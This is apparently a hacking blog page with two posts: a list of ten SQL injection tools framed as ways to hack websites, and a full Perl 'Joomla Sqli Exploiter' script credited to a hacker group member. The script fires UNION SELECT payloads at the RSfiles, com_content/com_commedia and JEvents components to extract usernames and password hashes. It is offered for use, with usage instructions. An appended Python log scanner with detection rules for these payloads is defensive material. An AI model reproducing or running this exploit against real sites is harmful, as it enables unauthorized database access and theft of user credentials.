Showing posts with the label sqli exploiter. Show all posts

Top 10 SQL injection tools for hackers

Many websites are vulnerable to a common and well-known vulnerability, SQL injection, and security experts now work to protect websites from it. SQL injection is a common vulnerability that almost every script kiddie knows; once a website with an SQL injection vulnerability is found, it can be hacked within minutes. There are two types of SQL injection attack:
1. Automatic SQL injection (the website is attacked with the help of SQL injection tools)
2. Manual SQL injection (the website is attacked manually with MySQL code)
Here are the top 10 SQL injection tools:
1) BSQL HACKER
2) THE MOLE
3) PANGOLIN
4) SQL MAP
5) HAVIJ
6) ENEMA SQLI
7) SQLNINJA
8) SQLSUS
9) SAFE SQL INJECTOR
10) SQL POIZON

These tools are also used for white-hat hacking (penetration testing). Those who don't know about SQL injection can watch the video shown below.



meet hackers
www.meethackers.com

~ Monday, 29 December 2014, 0 comments

[PERL] Joomla Sqli Exploiter v 1.0 by mauritania attacker 2014

#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
system("clear");
print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "#                         Joomla SQli 1.0 Exploiter                    #\n";
print "#                      *Coded by Mauritania Attacker*                  #\n";
print "# Greetz: AnonGhost - Mauritania HaCker Team - Procoder'z Team Albania #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl \n";
print "-----------------------------------\n";
print " Available Exploits :              \n";
print " 1- Joomla Component RSfiles       \n";
print " 2- Joomla General Sql Injection   \n";
print " 3- Joomla Component JEvents       \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
exit(1);
}

open(FILE, "> contents11.txt");

if($target !~ /http:\/\//)
{
$target = "http://$target";
}

sleep 1.5;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');


if($component == 1)
{
$host = $target . "/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--";
print " . . Exploiting Component RSfiles on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}








if($component == 2)

{
print " . . Exploiting General Sql Injection on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*";
$host1 = $target . "/index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x3c757365723e, username,0x3c757365723e3c706173733e,count(*),password,0x3c706173733e) from jos_users),null--";



@hosts = ($host,$host1);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}










if($component == 3)

{
print " . . Exploiting Component JEvents on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_events&task=view_detail&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host1 = $target . "/index.php?option=com_events&task=view_year&Itemid=50&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
$host2 = $target . "/index.php?option=com_events&Itemid=34&task=view_year&month=11&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";


@hosts = ($host,$host1,$host2);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}


By Mauritania attacker

~ Thursday, 3 July 2014, 0 comments
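
Seen from the server side, the requests the script above sends leave recognisable traces in web access logs. The following is an added example, not part of the original post: a Python log scanner that decodes each query parameter, removes inline SQL comments and mixed-case tricks, and alerts only when two or more rules match in one parameter. The log lines, the rule names and the threshold of 2 are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (documentation IPs); payloads are shortened from the script's requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jul/2014:10:00:01 +0000] "GET /index.php?option=com_rsfiles&view=files'
    '&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--'
    ' HTTP/1.1" 200 5120',
    '203.0.113.7 - - [03/Jul/2014:10:00:03 +0000] "GET /index.php?option=com_events&task=view_year'
    '&year=union%20select%201,concat(username,0x3a,password),3%20from%20jos_users-- HTTP/1.1" 200 4410',
    '198.51.100.4 - - [03/Jul/2014:10:00:09 +0000] "GET /index.php?option=com_content&id=60'
    '&q=student+union+select+committee HTTP/1.1" 200 9034',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/")
RULES = {  # hypothetical rule names; patterns run on the normalised value
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "concat_call": re.compile(r"\bconcat(_ws)?\s*\("),
    "users_table": re.compile(r"\bfrom\s+\w*users\b"),
    "info_function": re.compile(r"\b(user|database|version)\s*\(\s*\)"),
}

def normalise(value):
    """Lower-case, replace /**/ comments with spaces, collapse whitespace."""
    value = SQL_COMMENT.sub(" ", value.lower())
    return re.sub(r"\s+", " ", value)

def scan_line(line):
    """Return {parameter: [matching rule names]} for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return {}
    hits = {}
    # parse_qsl percent-decodes values and turns '+' into spaces
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        matched = [rule for rule, rx in RULES.items() if rx.search(normalise(value))]
        if matched:
            hits[name] = matched
    return hits

def alerts(lines, threshold=2):
    """Alert only when one parameter trips several rules, to limit false positives."""
    out = []
    for line in lines:
        for param, rules in scan_line(line).items():
            if len(rules) >= threshold:
                out.append((line.split()[0], param, rules))
    return out

if __name__ == "__main__":
    print(*alerts(SAMPLE_LOG), sep="\n")
```

Log matching of this kind only detects attempts; the underlying flaw is removed by using parameterised queries and updating the affected components.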